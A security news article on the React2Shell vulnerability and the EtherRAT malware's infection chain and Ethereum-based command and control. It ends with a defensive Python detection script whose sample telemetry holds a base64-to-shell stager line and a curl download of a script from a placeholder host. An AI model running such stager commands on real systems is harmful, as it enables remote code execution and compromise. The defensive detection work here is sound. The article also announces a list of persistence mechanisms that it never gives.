
Redazione RHC : 11 December 2025 07:13
Just two days after the critical React2Shell vulnerability was discovered, Sysdig researchers found new malware, EtherRAT, in a compromised Next.js application. The malware uses Ethereum smart contracts for command and control and achieves persistence on Linux systems in five ways.
Experts believe the malware is related to tools used by the North Korean Lazarus group. However, EtherRAT differs from known samples in several key ways.
React2Shell (CVE-2025-55182) is a critical vulnerability in Meta’s popular React JavaScript library. The issue, rated CVSS 10 out of 10, stems from insecure deserialization in React Server Components and allows remote code execution on the server via an ordinary HTTP request, with no authentication or privileges required.
The bug affects the latest versions 19.0, 19.1.0, 19.1.1, and 19.2.0 in default configurations, as well as the popular Next.js framework. Fixes have been released for React versions 19.0.1, 19.1.2, and 19.2.1, as well as for the affected Next.js versions.
Experts warn that similar issues may occur in other libraries with React Server implementations, including: Vite RSC plugin, Parcel RSC plugin, React Router RSC preview, RedwoodSDK, and Waku.

The vulnerability has already been exploited by the Chinese hacker groups Earth Lamia and Jackpot Panda, and at least 30 organizations have been affected by the attacks.
The attacks begin by exploiting the React2Shell vulnerability. Once the bug is exploited, a base64-encoded shell command runs on the target system; it downloads a malicious s.sh script via curl, wget, or python3, retrying every 300 seconds until the download succeeds. The downloaded script is then verified, made executable, and launched.
The script then creates a hidden directory under $HOME/.local/share/, into which it downloads version 20.10.0 of the legitimate Node.js runtime directly from the official website nodejs.org. It then writes an encrypted payload and an obfuscated JavaScript dropper, which it executes with the downloaded Node binary. Finally, the script deletes itself.
The dropper reads the encrypted blob, decrypts it with a hardcoded AES-256-CBC key, and writes the result to another hidden JavaScript file. The decrypted payload is EtherRAT, which runs under the Node.js runtime installed earlier.
According to experts, EtherRAT uses Ethereum smart contracts for command and control, which makes the attackers’ infrastructure resistant to blocking. The malware queries nine public Ethereum RPC providers simultaneously and selects the result by majority vote, protecting it against the poisoning or sinkholing of any single node.
Every 500 milliseconds, the malware polls its command-and-control server using random, CDN-like URLs and executes the returned JavaScript code via AsyncFunction. This gives the attackers a fully interactive Node.js shell.
According to analysts, North Korean hackers have already used smart contracts to distribute malware. This technique, called EtherHiding, has been described in reports from Google and GuardioLabs. Sysdig also notes that the encrypted download pattern in EtherRAT matches that of the BeaverTail malware used in the Contagious Interview campaign linked to North Korea.
The report also highlights EtherRAT’s extreme aggressiveness on Linux systems. The malware uses five mechanisms to persist on the infected system:
Another unique feature of EtherRAT is its self-updating ability. The malware uploads its own source code to an API endpoint and receives replacement code with the same functionality but different obfuscation. It then overwrites itself and launches a new process with the updated payload. According to the researchers, this helps evade static detection, hinders analysis, and lets the operators add specific functionality.
In its report, Sysdig provides a short list of indicators of compromise related to the EtherRAT distribution infrastructure and Ethereum contracts. The researchers recommend checking for the presence of the listed persistence mechanisms, monitoring Ethereum RPC traffic, monitoring application logs, and regularly rotating credentials.
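As an added illustration, not code from the Sysdig report or this article, the following Python sketches three detection rules for the chain described above, run over constructed sample telemetry: the base64 stager spawned by the application server, a Node.js binary launched from a hidden directory under ~/.local/share, and one process fanning out eth_call requests to several Ethereum RPC endpoints. The process names, hostnames, paths and the three-endpoint threshold are assumptions.

```python
import re
from collections import defaultdict

# Constructed sample telemetry (not from the Sysdig report). Process events:
# (host, parent_comm, comm, exe_path, cmdline). Egress events: (host, comm,
# dest_host, json_rpc_method). All hostnames and paths are placeholders;
# the base64 string decodes to the harmless "echo hi".
PROC_EVENTS = [
    ("web-01", "next-server", "sh", "/bin/sh", "sh -c 'echo ZWNobyBoaQ== | base64 -d | sh'"),
    ("web-01", "sh", "curl", "/usr/bin/curl", "curl -fsSL http://stager.invalid/s.sh -o s.sh"),
    ("web-01", "sh", "node", "/home/app/.local/share/.cache-x/node", "node .d.js"),
    ("web-02", "systemd", "node", "/usr/bin/node", "node server.js"),
]
NET_EVENTS = [("web-01", "node", f"rpc-{i}.invalid", "eth_call") for i in range(4)] + [
    ("web-02", "node", "api.partner.invalid", None),
]

APP_SERVERS = {"next-server", "node"}   # assumed names of the React/Next.js server process
SHELLS = {"sh", "bash", "dash"}
B64_PIPE = re.compile(r"base64\s+(-d|--decode)\b.*\|\s*(sh|bash)\b")
HIDDEN_NODE = re.compile(r"/\.local/share/\.[^/]+/node$")
RPC_HOST_THRESHOLD = 3   # assumption; EtherRAT is reported to fan out to nine providers

def detect_stager(events):
    """Rule 1: a shell child of the app server that base64-decodes into a shell,
    the first step of the React2Shell post-exploitation chain."""
    return [(h, cmd) for h, parent, comm, _, cmd in events
            if parent in APP_SERVERS and comm in SHELLS and B64_PIPE.search(cmd)]

def detect_hidden_node(events):
    """Rule 2: a Node.js binary executed from a hidden directory under
    ~/.local/share, where the s.sh script stages its private runtime."""
    return [(h, exe) for h, _, comm, exe, _ in events
            if comm == "node" and HIDDEN_NODE.search(exe)]

def detect_rpc_fanout(events, threshold=RPC_HOST_THRESHOLD):
    """Rule 3: one process issuing eth_call to many distinct Ethereum RPC
    endpoints, the fingerprint of EtherRAT's majority-vote contract lookup."""
    seen = defaultdict(set)
    for host, comm, dest, method in events:
        if method == "eth_call":
            seen[(host, comm)].add(dest)
    return [(h, c, len(d)) for (h, c), d in seen.items() if len(d) >= threshold]

if __name__ == "__main__":
    for rule in (detect_stager, detect_hidden_node):
        print(rule.__name__, rule(PROC_EVENTS))
    print("detect_rpc_fanout", detect_rpc_fanout(NET_EVENTS))
```

On a real host the same rules map onto process-exec and egress telemetry from an EDR or Falco-style agent; the eth_call fan-out rule is the one that addresses the report's recommendation to monitor Ethereum RPC traffic.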
Redazione